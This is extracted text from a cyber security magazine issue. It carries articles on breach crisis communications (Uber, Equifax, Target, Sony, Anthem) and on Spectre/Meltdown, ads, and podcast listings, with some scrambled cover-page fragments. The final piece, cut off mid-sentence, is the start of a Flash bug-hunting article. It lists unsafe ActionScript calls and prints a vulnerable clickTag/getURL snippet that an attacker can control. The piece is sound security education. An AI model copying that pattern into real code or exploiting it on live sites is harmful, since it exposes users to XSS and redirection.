You should consider using an outside public relations firm, if you don’t have the skills in-house. A crisis can be defined as the “sudden and unexpected creation of victims, accompanied by unplanned visibility for the organisation”. A serious data breach can certainly meet this definition; the release of personal information can lead to identity theft, and in some cases depending on the information, extortion, and in a worst case scenario suicide (http://www.abc.net.au/news/2015-08-25/ashley-madisonhack-two-people-may-have-committed-suicide/6721840). To prepare, pre-draft your crisis messages and website content ahead of time. Mounting a response to a data breach occurs long before the breach actually happens. A key challenge in a crisis, is to minimise negative or hostile media coverage, that can undermine the confidence of your customers, employees, shareholders and business partners. Your communications should be quick to establish yourself as the best source of information regarding the breach, explaining what has happened, what your organisation is doing to fix the problem and how you’re keeping any victims safe. In a crisis situation, most commonly, a “holding statement’ is issued, as soon as possible. A holding statement provides the media with an initial statement that sets out the basic facts about the incident and lets people know that you’re dealing with the situation. The holding statement should contain as much factual information as is available, however limited it may be, together with a firm commitment to provide further information when it comes to hand. Your statement should describe the immediate
18 | Australian Cyber Security Magazine
steps that have been taken and what you intend to do next. The most important aspect of a holding statement is to be honest. Aim to establish and maintain credibility by acknowledging the facts. Your credibility will depend on your audiences’ assessment and perception of your level of honesty and sincerity, so if credibility is lost, trust is lost also. Acknowledge that the information you have is incomplete and may change over time as your investigation continues. When drafting your holding statement consider the following: • Define and introduce your spokesperson – who are they exactly? • Keep the statement short and simple, for example, “We understand that there has been a data breach”. • Explain what your priorities are, “We are working to limit any damage or harm to our valued customers”. • Explain that the appropriate authorities have been contacted, for example law enforcement and specialist forensic investigators (if applicable). • Reassure the public of your priorities and assure the public and media that you will keep them updated as more information comes to light. Prior to an incident ensure that you have told your people how to respond to questions from the press and media, something along the lines of, “Thank you for your question. I am not a designated spokesperson for the company, please go to www.companywebsite.com.au” or contact our communications team. A statement must always express regret about the situation and be clear on what information you can provide
at this time and what cannot be provided. Ensure that you provide a consistent message across all channels, from the company website, your intranet (don’t forget about your employees) and social media. Prepare your call centre for an influx of calls and provide them with a script to ensure that everybody is sending a consistent message. The use of a call centre is important, as those affected must be able to speak to a live person, rather than a machine and try to keep wait times to a minimum. All technical incident response plans must be designed to answer 6 questions, the answers to these questions will allow you to craft your messages and identify who your audiences are. 1. What systems and data have been affected? 2. How did the attackers do it? 3. Who did it? 4. Is it over? 5. Can it happen again? If so, how? 6. How can we stop it from happening again? In order to communicate what has happened to your stakeholders, it is important to gather and understand all the facts of the breach inside and out. Understand and identify who is impacted and affected, because in turn you’ll use this information to develop your communication messages around those individuals and/or groups. Incidents can be very challenging and having a complete picture of what happened, who did it and why may take days or weeks and require specialist skills that your in-house team does not have. Consider using specialist incident response resources if your in-house team doesn’t have the rights skills and knowledge. Better still, have them on retainer. The time taken to ensure that the right contracts are in place before an incident will let you sleep better at night. You don’t want to be in a situation where you’ve just had a data breach and you’re negotiating contractual terms with the people that can help you the most. When a crisis or bad news strikes your organisation, the first place that the outside world will turn to for information is your company’s website. There won’t be time to construct a new site from scratch, so consider creating a “dark site’ ahead of time. A dark site is a prebuilt website that can be activated when needed. A dark site positions your organisation as the primary source of information about the crisis and it signals to the news and media that you intend to provide timely and accurate information and it demonstrates that you’re in control and taking your responsibilities seriously. In general, your dark site should list all available facts, any special instructions as to what those impacted should do, what steps your organisation is taking and any relevant contact information. On June 15, 2009, US Airways flight 1549 left New York airport and hit a flock of geese causing the loss of both engines. The plane made an emergency crash landing into the Hudson River, all 155 people survived the harrowing ordeal due to the skill and quick thinking of the pilot, Capt. Chesley “Sully” Sullenberger. This event helped Twitter become a social media powerhouse and it changed the way that the news is reported. The man who started it all is Janis Krums, he tweeted, “There’s a plane in the Hudson.
The plane made an emergency crash landing into the Hudson River, all 155 people survived the harrowing ordeal due to the skill and quick thinking of the pilot, Capt. Chesley “Sully” Sullenberger. This event helped Twitter become a social media powerhouse I’m on a ferry going to pick up the people. Crazy”. He tweeted that to his 170 followers. Exactly 32 minutes later he was being interviewed live on MSNBC and later his photo appeared on the front page of national newspapers. Twitter co-founder Jack Dorsey told CNBC in 2013, "Suddenly the world turned its attention, because we were the source of news—and it wasn't us, it was this person in the boat using the service, which is even more amazing!”. The news no longer breaks, it tweets. Social media is an umbrella term applied to web enabled applications that are built around user generated and manipulated content such as wikis, podcasts and social networking site such as Twitter, Facebook and YouTube. Social media has created citizen journalists and the age of instant news and direct reporting, from those that have been affected in some way. It has forever changed how the public gets their news. This in turn has changed the way that responses to a data breach must be handled such that a response must be immediate; it must include a commitment to two-way dialogue and to being open, honest and transparent about what has happened and what is being done to fix the problem. Social media adds a complexity to communicating in a crisis, the multiple user channels, user control over messages and the real-time delivery of these messages, makes social media far more complex to manage that the simple press releases of days gone by. The use of social media in your communications plan is no longer optional in the era of instant and always available news. When communicating post breach, your goal should be to satisfy your audience and provide sufficient information. Identify those that have been affected, ensure that your messages are correct and consistent, so that any corrections are limited. This will make it easier for you to maintain your credibility. The biggest mistakes are not being proactive and not having a full grasp of the facts of the breach before issuing communications. To develop and maintain credibility you must show that your organisation is on top of the situation and has implemented an action plan to control and mitigate against further harm. When structuring your communications, be sure to: • Admit your mistakes. • Communicate early and often. • Be sure to tell your side of the story before someone else does.
Australian Cyber Security Magazine | 19
Cyber Security
•
Explain what will be different in the future.
Communicating after a data breach is difficult as not all of the facts may be known, but it is always necessary to show concern for the safety of those that have been impacted. When choosing your communication channels, considering the following: • Written statement or press release; • Your website; • Email out to those affected; • Call centre scripts; • In store signage; • A written letter; • Social media posts; • Advertising on the radio, in TV or newspapers; and • A video message. In Australia, it is now mandatory for organisations that must comply with the Privacy Act to report breaches of personal information to both the Office of the Australian Information Commissioner (OAIC) and those affected. Notification is required were there is the real risk of serious harm. Once a decision has been made to notify those affected, consider when and how notification should occur and who will make it and who exactly will be notified. Notification may be made via phone, letter, email or in person. The notification should include: • A description of the incident. • The type of personal information that has been lost. • The organisation’s response. • What type of assistance is available. • Contact details. • How the individual may lodge a complaint to the OAIC. For a detailed discussion of Australia’s Mandatory Data Breach laws, refer to my article in the third edition of Australian Cyber Security Magazine, “Mandatory Data Breach Reporting: What You Need to Start Doing Right Now”. In other countries that do have mandatory data breach notification laws, the demand for identity monitoring and cyber insurance services grows once notification becomes mandatory creating new industries. Post breach notification requirements drive the implementation of incident response processes that may become a source of competitive advantage between organisations. Nothing beats real world examples, so let’s take a look at five breaches that have made the headlines, Uber, Equifax, Target, Anthem and Sony.
Uber Uber experienced a data breach in October 2016, but only revealed existence of the breach in November 2017. Hackers had accessed the personal information belonging to 57M Uber users and drivers. Uber had failed to notify its customers, drivers and regulators of the breach. The information accessed included name, email address, phone number and for some users, their driver’s license details. Following the announcement of the breach Uber provided that whose driver’s license information had been accessed
20 | Australian Cyber Security Magazine
free credit monitoring and identity theft protection. It was also revealed that Uber had paid $100K to the hackers responsible to delete the data and keep quiet regarding the breach. Ubers Chief Security Office and a deputy left in the wake of the scandal. At the time of the hack, Uber had just settled a lawsuit with the New York attorney general over data security disclosures and was in the process of negotiating with the Federal Trade Commission over the handling of consumer data. Uber is a company not short of controversy, at the time the breached was announced, U.S. officials are looking into possible bribes, illicit software, questionable pricing schemes and theft of a competitor’s intellectual property. Uber attempted to cover up the breach, this is never a good approach. They took over a year to disclose what had happened and when the details were disclosed it was found that they had paid the hackers $100K to keep quiet. Uber is now subject to numerous government backed law suits and investigations across many different jurisdictions, resulting from the failure to disclose the breach to regulators. Add to that the very likely class action law suits and Uber’s legal position becomes even more tenuous. When reached for comment, an Uber spokesperson said: "We take this matter very seriously and we are happy to answer any questions regulators may have. We are committed to changing the way we do business, putting integrity at the core of every decision we make, and working hard to re-gain the trust of consumers." In short, if you suffer a breach, disclose it in accordance with any applicable laws and within the required timeframe. Uber by all accounts failed generally at good corporate governance across many facets of its business operations. Incidentally, the hackers gained access to Uber’s AWS environment by using credentials they found in a private Git repository. Uber’s developers had published code that included their usernames and passwords.
Equifax In September 2017 the credit reporting agency said the information of more than 145 million Americans had been compromised. Whilst the data breach was not the largest, it could become the most economically damaging due to the sensitivity of the compromised information. The company’s handling of the breach is quite possibly the worst response to date of any organisation. The breach itself occurred sometime between mid-May and July. The hack was discovered on the 29th of July and the company waited 6 weeks to disclose the breach. If that was not bad enough: • In the wake of the breach Equifax offered free credit monitoring to customers – but the offer required anyone who enrolled to waive their right to sue the company. The company later backpedalled • CEO Richard Smith‘s apology is lack lustre at beat and does not highlight the gravity of the information that was lost and the implications for those impacted. Proper crisis management calls for a sincere apology that assumes responsibility, and promises to investigate the mishap and most importantly, make amends. Apologies written to reduce legal liability will not be taken well • The day after announcement of the breach, the Equifax
•
Twitter customer service account tweeted “Happy Friday! You’ve got Stevie ready and willing to help with your customer service needs today!” Twitter users did not appreciate the tweet’s tone. It was not a good way to show empathy to the many people worried they may become victims of identity theft. All social media channels should be aligned once an organisation is in crisis mode Those who called the number provided by Equifax and managed to reach someone or receive a return call were told that the call-centre had no information to share
Target A data breach is bad but letting someone else tell the world it has happened is even worse. Brian Krebs from www. krebsonsecurity.com leaked the story about the Target breach 6 days before Target acknowledged the situation. Over 40 million credit/debit card numbers were leaked as well as the personal details of over 70 million customers. The sooner the incident is acknowledged, the sooner you can start saving face. From the Target breach we learned that organisations must be prepared for the influx of customer complaints and enquiries. Targets Call Centre was over whelmed and its social media channels folded with complaints. Despite an initially shaky start, Target was able to pick up its responses by: • Daily news briefings. • The CEO issuing an apology via video. • Shoppers received a discount. • A web site was created for disseminating information related to the breach. • Providing free credit monitoring for a year to impacted customers.
Sony Sony’s response to the 2014 incident should stand as a lesson in what NOT to do. The Sony Picture CEO is on the record as stating that Sony had no playbook on how to respond. Sensitive document, embarrassing emails, unreleased movies and the personal information of over 40,000 people, both current and former employees, was leaked. Sony waited days to respond to the media and missed opportunities to update the public on what was happening. In short, be prepared, have a plan, test it and make sure that everyone on your team knows what to do when the inevitable data breach occurs. About the Author Wayne Tufek is currently the Director of CyberRisk (www. cyber-risk.com.au). For over 20 years he has formulated pragmatic, business driven strategies to establish, execute and improve cyber risk management in ASX listed companies and some of Australia's largest organisations across the public sector, Big 4, financial services, consumer products, education and retail sectors. Wayne is a member of Chartered Accountants Australia and New Zealand and holds the SABSA SCF, CISSP, CRISC and CISA qualifications. He frequently presents at security conferences and events in Australia and internationally.
INNO VATE
Anthem Anthem at the time of the data breach was the USA’s second largest health insurer. Over 80 million customer records were exposed containing personal information like name, address, date of birth, social security number, email address, phone number and salary. Upon discovering the breach Anthem, secured the vulnerability, contact the FBI and engaged an outside security consulting firm. Anthem’s initial efforts were praised by the FBI. Anthem’s response featured: • The launch of a dark site – www.anthemfacts.com • A statement by the CEO. • Release of frequently asked questions. (FAQ) • A phone hotline. • An open letter from the CEO. • Social media releases on Facebook and Twitter. • The provision of credit monitoring and identity protection services to impacted customers. Anthem was quick to respond to customer queries. Most news stories regarding the breach contained direct quotes from Anthem spokespeople, elements of their initials statements and links to the dark site.
HOW ARE YOU MANAGING YOUR CYBER RISK? Attend the most comprehensive cyber conference in Australia! Participate in business tracks free of technical language, hear from international thought leaders in cyber and engage in workshops and training to equip you with a better understanding of how you can manage this risk.
Register now at cyberconference.com.au From only $275 Save up to $825 on conference fees by becoming an AISA member today and access the many benefits received by our membership network
OCT 9-11
2018
AUSTRALIAN CYBER CONFERENCE
AISA-2018-Forge-Press-Ad-V07.indd 1
BROUGHT TO YOU BY
aisa.org.au
9/02/2018 11:27 am
Cover Feature Cyber Security
n w o d t l e M fire n d o s ’ n r a he ca e t r e l t i h c Spe bout the tyres w
ng a Worryi
G By Elliot Dellys
rowing up, my father constantly gave me advice in the form of single-sentence philosophical soundbites. I couldn’t stand it at the time, but, over the course of my career I have parroted them far more often than I care to admit. The one I’ve found myself repeating more than any other is: “you’re worrying about the tyres while the car is on fire”. It is easy to get excited about new or dramatic information, especially when it potentially affects our business – yet too often organisations focus on the hot topics, while the broader enterprise is jeopardised by risks that remain overlooked or are simply put into the “too hard basket”. This article will provide a high-level technical breakdown of what has likely been the most widely-reported group of vulnerabilities to date, collectively referred to as Spectre and Meltdown. It will cover how speculative execution works, how it is vulnerable to attack, why the reach of Spectre and Meltdown is so broad and their impact potentially so catastrophic, and the current mitigations available. But I will also offer a case for why they are – at least for the time being – unlikely to be your business’ top cyber risk. For most readers Spectre and Meltdown are unlikely to even
22 | Australian Cyber Security Magazine
be your organisation’s most severe technical vulnerability – but they are almost certainly the most well-known. In closing, I will outline how a solid implementation of the security basics is typically the best protection against emerging threats. To understand the risk posed by Spectre and Meltdown, it is worth briefly outlining the principle of speculative execution. For decades CPUs have been designed to perform their number-crunching duties ‘out-of-order’ to attain processing speeds beyond what is achievable from a simple sequential instruction cycle. Modern processors typically achieve this via speculative execution, in which multiple execution branches are prepared simultaneously and the hardware assumes – or ‘speculates’ – about which branch is likely to be taken. When this speculation is accurate, the processing time is decreased as the instructions have already been calculated; when it is not, the unnecessary calculations are simply discarded. The fundamental flaw in this process is that speculative execution allows for privileged information to be observed by a process of lower privilege. The three Common Vulnerabilities and Exposures
Cyber Security
Exploiting each requires a slightly different attack methodology: whereas Meltdown disregards privilege boundaries to allow an unprivileged process to access the kernel address space, Spectre leverages branch prediction to execute erroneous instructions and leak information from the victim’s memory address space.
(CVEs) disclosed to date include: CVE-2017-5753 (Bounds Check Bypass) and CVE-2017-5715 (Branch Target Injection), collectively known as Spectre; and CVE-20175754 (Rogue Data Cache Load), which has been dubbed Meltdown. Exploiting each requires a slightly different attack methodology: whereas Meltdown disregards privilege boundaries to allow an unprivileged process to access the kernel address space, Spectre leverages branch prediction to execute erroneous instructions and leak information from the victim’s memory address space. The breadth of these vulnerabilities is exceptionally broad: Meltdown affects almost all of Intel's x86 processors (and some ARM designs) and Spectre, which exploits a wider range of speculative execution features, potentially affects all Intel, AMD, and ARM microprocessors. This means almost every processor produced in the last twenty years is vulnerable, regardless of operating system or device type (including network equipment, end-user systems, as well as mobile and IoT devices). In fact, the Spectre attacks are so adaptable that by leaking information from the browser address space to JavaScript, sensitive information such as credentials or credit card details from any capable
device can potentially be exposed. One of the saving graces of the Spectre and Meltdown threat is that, as of the time of writing, no publicly known malware exploits these vulnerabilities. With so many potential targets and such valuable data ripe for the taking, it is natural to wonder why. Luckily, these attacks are very difficult to execute in the wild for several reasons. Firstly, vendors were notified under non-disclosure agreement several months before the public announcement to allow ample time for mitigations to be developed and infrastructure to be updated. This has made opportunistic malware development significantly less fruitful. Secondly, for these attacks to be viable, the attacker must already be able to run code on the target machine; in the case of Spectre, this can include malicious JavaScript executed by the user's browser. This poses an additional and non-trivial hurdle for any attacker hoping to mount a Meltdown or Spectre attack. Thirdly, the applicability of the vulnerabilities is relatively limited. Exploiting Spectre or Meltdown does not inherently enable code execution, network lateral movement, spoofing, repudiation, etc. Finally, developing software capable of exploiting these vulnerabilities requires an exceptional level of skill and a deep knowledge of the target environment. The reconnaissance necessary to execute a Spectre or Meltdown attack is orders of magnitude greater than the SMB handshake required to detect vulnerability to Wannacry, for example. Nonetheless, there is inevitably a delay between vulnerability disclosure and industry remediation that provides attackers a window of opportunity. So, what can be done right now to prevent future attacks? Operating system patches are either already available or under development to address the two vulnerabilities. For Meltdown, this entails isolating the kernel and user mode page tables to prevent leakage of sensitive data. For Spectre, the solution is not so straightforward: as there are two variants of attack that each affect a far broader range of hardware, modification of the compiler
Australian Cyber Security Magazine | 23
Cyber Security
or elimination of branch speculation for processes pertaining to sensitive data is required. To minimise the risk of attacks using JavaScript, WebKit have begun implementing branchless security checking as well as reducing timer precision, and Intel has announced it will begin implementing capabilities to alter the behaviour of branch prediction for its processors as well as releasing microcode updates where possible. AMD have responded by advocating for a collaborative effort amongst industry and safe computing practices (including patching) for customers to minimise the threat. Unfortunately, but predictably considering speculative execution exists to optimise processor performance, the current solutions come at a performance cost. By isolating the kernel and user mode page table, the translation lookaside buffer (which is responsible for mapping virtual addresses to physical memory addresses) needs to be constantly flushed. This has been widely reported to cause up to a 30% loss of performance, however, early benchmarking results indicate this figure is the exception, not the rule, and only representative of workloads that demand constant context switching (i.e. frequent access to both the user and kernel memory space). Obviously, there are industries and networks with a very low tolerance for performance loss, for whom careful prioritisation of patch deployment and a strong asset management strategy are essential. For most organisations – and individuals – the performance drop is likely to be negligible. The authors of the Spectre and Meltdown whitepaper acknowledged the inevitable performance impacts from the outset, attributing the emergence of these vulnerabilities to a “longstanding focus in the technology industry on maximizing performance”. Mitigations that better preserve the efficacy of speculative execution and data caching are also likely to emerge in the coming months, so concerns about performance loss from patching is, for most industries, likely to diminish correspondingly. Of course, this timeless balancing act between performance or user experience and security is nothing new. I have explained to numerous clients why having a “zero risk tolerance” functionally entails shutting an entire system down. The goal is therefore to ensure the allocation of effort is proportionate to risk, in both identifying exposure to emerging vulnerabilities in general and in ensuring security requirements are considered alongside performance expectations. To achieve this, a clear security strategy is invaluable: getting the basics right always provides a strong starting position to counter any emerging threat. In the case of Spectre and Meltdown, an unpatched browser or existing access to the target device is a prerequisite for exploitation and therefore the standard suite of security controls (such as ASD’s Essential Eight) provides a solid baseline of protection against an attacker, gaining the necessary initial foothold. Maintaining an accurate asset register and understanding the value of those assets is also imperative. For some devices, performance may be critical, and the information handled is without sensitivity; for others, performance will be less important, but the information processed requires the utmost protection. This insight is essential when making
24 | Australian Cyber Security Magazine
informed decisions about what devices require immediate attention and which can be afforded a lower priority for remediation. Understanding what other vulnerabilities those assets may be exposed to, also provides a more complete picture of the threat environment and can inform risk tolerance and management strategies. It is also crucial to avoid underestimating the human element. A well-trained and informed workforce is one of the best measures to ensure vulnerable assets are not discovered by a threat actor in the first place. The same holds true for key decision-makers. Test your key assumptions and ask: “how would I gain unauthorised access to my organisation’s sensitive data?” For most readers, this exercise will almost certainly produce a long list of vectors that pose a greater threat than Spectre and Meltdown. This perspective goes a long way towards ensuring your attention is focussed on the flaming engine, and not the shiny new Bridgestones. As a final note, it is my belief that the media and industry reaction to the disclosure of Spectre and Meltdown has exposed a fascinating selection bias in the way we contextualise risk – but that will be the subject of another article. About the Author Elliot Dellys is a Senior Security Advisor for Hivint, with extensive experience delivering complex technical projects, teaching international audiences, and providing risk management and compliance advice across Government and Industry. Elliot is a firm believer that strong relationships and a collaborative culture are the keys to achieving meaningful security maturity, and enjoys writing on the more abstract applications of cyber security in the fields of politics and ethics.
We’re TRANSFORMING Join us as we embark on the next phase of our journey
- visit our new online store at hills.com.au -
HCORP0011-Jan18-v1
For more information on these and other best-in-class solutions from Hills call us on 1300 HILLS1 (445 571) or visit hills.com.au
facebook.com/HillsLtd/ CONNECT
E N T E RTA I N
SECURE
Australian Cyber Security Magazine | 25
E TUN IN ! NOW
www.australiancybersecuritymagazine.com.au
PODCAST HIGHLIGHT EPISODES
Episode 28 – Australia’s eSafety Commissioner, Julie Inman-Grant discussing online safety, cyber bullying and child exploitation
Episode 15 – Protecting media & journalists in hostile environments – Shannon Sedgwick, CEO of GM Risk Group
Julie Inman-Grant, the Australian eSafety Commissioner at the Office of the eSafety Commissioner, speaks with Chris Cubbage at the Women in Cyber Mentoring Event in Sydney. Julie discusses her role and her focus on online safety, preventing cyber bullying, and child exploitation, and how her 17 years formerly at Microsoft, as well as Adobe, and Twitter, assist her in her role as the Commissioner of eSafety.
In this interview, Chris Cubbage interviews Shannon Sedgwick, CEO of GM Risk Group, a consulting firm specialising in protecting media staff, both in terms of physical and cyber security, as they travel in hostile environments.
Chris and Julie also discuss the three pillars within eSafety of safety, security, and privacy and their inter-connectedness and priorities, and how parenting and education are still the two major lines of cyber-defence.
Shannon has personally provided protective services to media companies and has travelled to over 30 countries this year, including the Congo, Afghanistan, and Iraq. Shannon discusses the services that GM Risk Group provide, how to mitigate risk, and the increased focus of media companies on duty of care and overall safety for journalists. If you, or members of your team work in regions of the world, where data or physical safety are at risk, then you’ll enjoy this interview with Chris Cubbage and Shannon Sedgwick.
Episode 25 – ECU Cooperative Research Centre & Dr Peter Hannay’s research into historical location data within digital devices In this interview, Dr Peter Hannay of Edith Cowan University (ECU) provides insight into the recent completion of his doctoral research which focused on historical location data that can be gathered from small and embedded devices. This research was used by WA Police to assist in homicide cases, for tracking a suspect’s movements, as well as providing a credible alibi. Peter also talks about ECU’s Cooperative Research Centre, a $130 million-dollar project, as well as leading research in cyber security, particularly IoT. If you’re interested in cyber security research, and true crime, then you’ll enjoy this interview with Chris Cubbage and Dr Peter Hannay.
Episode 8 – Meet Renowned Autonomous Vehicle Security Architects & “White Hat” Hackers, Dr. Charlie Miller and Chris Valasek, GM’s Cruise Automation You’ll love this interview with Charlie Miller and Chris Valasek. As the sixth interview at #AISACON17 in Sydney, we met these celebrity ‘security architects’, who first hacked two non-connected, commercially available cars using a diagnostic port. While some consideration was made to security in the original software, Chris and Charlie highlighted that with a little problem solving, and a lot of patience, control systems, effecting steering, brakes and lights could be manipulated. Later, the dynamic duo set their sights on ‘remotely’ hacking a Jeep SUV. In this interview, we’ll learn how they were able to bridge the gap between the ‘head unit’ or radio, and the control systems, and take control. All while the driver was travelling at over 100 km per hour. Enjoy the discussion!and privacy and their inter-connectedness and priorities, and how parenting and education are still the two major lines of cyber-defence.
Episode 17 – Tackling online extremism through inclusion and tolerance: The Raqib Taskforce In this interview, Chris Cubbage interviews Anooshe Mushtaq, Chair and Founder of The Raqīb Taskforce, an organisation that promotes social inclusion and cohesiveness for Australia’s Muslim community, particularly the youth. Anooshe shares how her grassroots organisation is helping to debunk hate speech, remove division, and promote the voice of young Muslims, to counter extremism both within and outside the Muslim community. This involves a host of online and social media strategies. Ultimately, the Raqib Taskforce aims to build a tolerant and cohesive society, through better understanding of all sides. Please Note: This interview was arranged and conducted by MySecurity Media independently of the Risk Management Institute’s National Conference. Recorded November 16, 2017, Canberra.
Episode 9 – Cyber Threat Alliance (CTA) President Michael Daniel in Sydney #AISACON17 Our seventh interview at #AISACON17 in Sydney in October, is with the President of the Cyber Threat Alliance, Mr Michael Daniel. In this interview, Michael Daniel talks about his new role at the Cyber Threat Alliance, or CTA, and how his organisation and the 12 member companies are sharing threat intelligence at speed and scale. In particular, you’ll hear about the CTA’s ‘sharing rule’, that ensures collaboration, and improves all members’ products and services. And this sharing is quick. Michael highlights that the time from detection by one member company to deployment by another member company can be as short as only 54 minutes. In this interview you’ll hear cyber security vendors working together to collectively, systemically disrupting the ‘bad guys’.
www.australiancybersecuritymagazine.com.au
PODCAST HIGHLIGHT EPISODES
Episode 49 ASEAN-Australia AUSTRAC Codeathon 2018 – Interview with AUSTRAC’s Chief Innovation Officer & Director for Innovation, Information & Transformation Chris Cubbage talks to Leanne Fry, Chief Innovation Officer, and Rajesh Walton, Director for Innovation, Information & Transformation, both of AUSTRAC, at the ASEAN-Australia Codeathon held in Sydney.
Episode 37 Red Hat, the world’s largest open source software company in APAC & video surveillance You’ll hear about the role of Red Hat as a technology steward, bridging open source software with enterprises, while maintaining piece-of-mind, the Red Hat product suite, and their role in reducing the costs within the surveillance market through more efficient data compression algorithms and storage.
Episode 47 The entertaining Adam Spencer, MC of the ASEAN-Australia Codeathon, hosted by AUSTRAC
Episode 36 Artificial Intelligence, Deep Learning & Neural Networks
The always entertaining and intelligent Adam Spencer, MC at the ASEANAustralia Codeathon in Sydney, hosted by AUSTRAC. Adam discusses the importance of regional collaboration, with respect to cyber security, and also how blockchain technologies could help to increase integrity in our daily lives.
Hans Skovgaard, the Vice President of Research & Development with Milestone Systems discusses Artificial Intelligence, it’s changing popularity over the past 30 years, and its resurgence in relation to deep learning, due to the power of today’s computational neural networks
Episode 48 Implications & Opportunities of the European Union’s GDPR and Australia’s NDB scheme
Episode 31 Women in Cyber – Sandra Ragg, Deputy National Cyber Security Adviser within the Department of Home Affairs and Cabinet & Heide Young, National Events Manager, Australian Women in Security Network
David Kemp, Specialist Business Consultant, and Matthew Hanmer, Regional Director Security Software, both from Micro Focus, the 7th largest pure software company in the world, discuss the implications of the European Union’s GDPR, or General Data Protection Regulation, and Australia’s Mandatory Notifiable Data Breach (NDB) scheme.
Episode 45 Insight into MarkLogic’s Secure NoSQL Database Tim Macdermid, VP of Sales for APJ, and Jason Hunter, the CTO of Asia-Pacific, both of MarkLogic talk about the company’s growth, and expansion starting from servicing publishing, public sector, intelligence agencies, and financial services, big and small, as well as its application within cyber security.
Sandra Ragg, Deputy National Cyber Security Adviser within the newly formed Department of Home Affairs and Heide Young, the National Events Manager for the Australian Women in Security Network, or AWSN discuss the role of the AWSN, its rapid growth in membership, future plans of cooperation and initiatives, its role in mentoring women in cyber security, as well as the cultural change required to increase the percentage of women in cyber security, but also the importance of inclusion of women, not just diversity for diversity’s sake.
Episode 30 CISO Insights – Narelle Devine, Chief Information Security Officer – Australian Department of Human Services
Episode 22 Analyst Insights – Enterprise cyber security market & China’s citizen score card with cyber regulations
Narelle Devine, Chief Information Security Officer for the Department of Human Services discusses the difficulty in going out to market to find talent in cyber security, and how it takes ‘all sorts’ with a broad experience to build a strong cyber security team. The interview also discuss her role as a CISO and the importance of developing a peer-to-peer network to generate solutions and collaborate on ideas.or General Data Protection Regulation, and Australia’s Mandatory Notifiable Data Breach (NDB) scheme.
Claudio Stahnke, Research Analyst focused on IT security with Canalys, recorded at the Canalys Channels Forum, 5-7 December, 2017 in Perth discusses the enterprise cyber security market in general, the EU’s General Data Protection Regulation, or GDPR, as well as mandatory reporting on security breaches, cyber insurance, vendor mergers, IoT predictions, and China’s citizen score card (Social Credit System) and their cyber regulations.
www.australiancybersecuritymagazine.com.au 28 | Australian Cyber Security Magazine
W O N
S G A E E-M
T U O
N I L N O
THE
T
MEN
VERN
G GO
EADIN
Y’S L UNTR
ECU
ATE S
RPOR
CO AND
.austr www E |
GAZIN
MA RITY
a
ecu lians
ritym
agaz
u
2018 March
g the Closin gap ls il sk curity
Se
g an Creatin rld – EAD wo s ence ING sGtOeVm intellig e Sy ERNME Cybe Mileston IPS 2018 NT AND COR POR ATE of 20 rsecurity M SEC URIT 18 Trend YM AGA s ZINE y it | w r u c ww.a e S siap in l n a e acif n The s o m s o icse r e W P curit t l: yma cryp ate of m Specia o deliver gaz ine.c tomi t n om y it ning inaslipcirioautio s secur Sma rt Ph o Alter Cont nes as Ac n rol C powe ative pa rede cess ymen ntial red b s ts y Blo Trend ckch s in t ain h indu Dark stry e techno – op logy Anon Web, Tor p ymit & scale ortunity, y & Ch ina THE
d
mous
no f auto Rise o s vehicle
sics
l foren
REG
ION
’S L
March
READ NOW
US
PL
$8.95
om.a
sa nge a te cha y issue a m li C curit al Sse nation
Cyber
fine are de Softw ing th every
Digita
ine.c
Feb /
CO
e s in th try Trend logy indus o n tech
227
100003
ved PP
t Appro
Print Pos
urity
Sec men in
Wo
/ April
2018
Intel Creating ligen a t Wo n rld
e
tim | Tech
Auto
nom The Rise ous V ehicl of es
T
INC. GS
$8.95
INC.
GST
CYBERS ECURITY TRENDS of
READ NOW
201
8
PLUS
Wom en
in Se
curit
y | T echt
ime
www.australiancybersecuritymagazine.com.au
Australian Cyber Security Magazine | 29
Cyber Security
XSSposing bugs via Shockwave Flash analysis
F By Jason Magic
lash player related vulnerabilities have been notorious in their susceptibility to a vast range of attacks over time. When performing an offensive engagement, whether it’s through consultancy, or through external responsible disclosure programs, it is highly recommended that analysis of any Shockwave Flash (SWF) file be performed. While many haven’t explored such an attack path, this is a widely known issue. During my brief period as a bounty hunter, I had identified SWF related vulnerabilities, within a multiplex of
associated with the insecure variations being hosted and exposed to the public domain. SWF files are created through ActionScript syntax, which, is very similar to JavaScript, as both conform to the ECMA-based syntax. Like any other language, failure to properly validate and sanitize user inputs, can leave the segment vulnerable to various attacks. Furthermore, ActionScript itself contains vulnerabilities associated with it, this includes methods rendered ‘unsafe’, such as, but not limited to:
organizations, as well as high profile government entities, including that of; Police agencies, NASA, NATO, Australian Signals Directorate, US Army, US Airforce, US Navy and more. As opposed to deep diving into flash exploitation and the various attack vectors. This article will be focusing on a more generic overview, prior to presenting my own findings, as a reminder as to how Shockwave Flash (SWF) files can pose a threat, their capabilities and the potential attack path
externalInterface.call(); getURL(), loadVariables(), navigateToURL(), loadMovieVar(), loadMovieNum(),LoadVars.load, LoadVars.send, XML.load ( 'url' ), XML.sendAndLoad ( 'url' ), LoadVars.load ( 'url' ), LoadVars.send ( 'url' ), flash. external.ExternalInterface.call(_root.callback), externalInterface.addCallback, AddDLL, etc..
Cyber Security
Insecure global variables:
_root, _global, _level0
In terms of performing the analysis, SWF files can be decompiled through various tools, a common one being flare. Therefore, exploitation is handled in a white-box mannered approach. Once decompiled a source code analysis can be initiated. There are tools out there that can perform a static-code analysis in an automated manner, however, they often miss many insecurities. Therefore, it is recommended that a more manual approach be taken. Since ActionScript is a straight forward language, only basic knowledge of its structure, methods and syntax is required. The main objective with the code analysis is to get an overview of the code flow, how variables are handled and, if possible, how to manipulate such variables. For example, look for lack of input sanitization, undefined flashvars, use of the insecure global variables and method calls. If any of the above global variables are declared, but remain undefined, then it is likely that the SWF will be vulnerable. For example, see a vulnerable decompiled source below: button 48 { on (release) { var str = (_level0.clickTag != undefined) ? _level0. clickTag getURL(str, ''); } } The above illustrates a vulnerability pertinent to the clickTag flashvar. During an analysis, it was discovered that this ‘clickTag’ variable is associated with the release of button 48, note the use of the global var, _level0. This button was mapped to the entire flash movie. This means that the value stored within this flashvar is called strictly upon the condition of the victim clicking anywhere on the movie itself. Therefore, in this case, the vulnerability does require a form of social interaction for its successful exploitation, as the user is required to click on the flash movie to trigger the exploit. In the case of the above scenario, the clickTag flashvar was initially declared to serve a purpose of re-directing a user to an informative page segment within the HTTP content. However, due to the lack of variable definition, as well as, lack of input sanitization, use of the unsafe GetURL() method, and incorporation of the insecure _level0 global variable; an attacker is able to control the behaviour of the vulnerable variable in question. This is achieved by assigning malicious values to that var and have it called via GET. Such vulnerabilities could exist within Shockwave Flash files includes; SOME attacks, content forgery, unvalidated 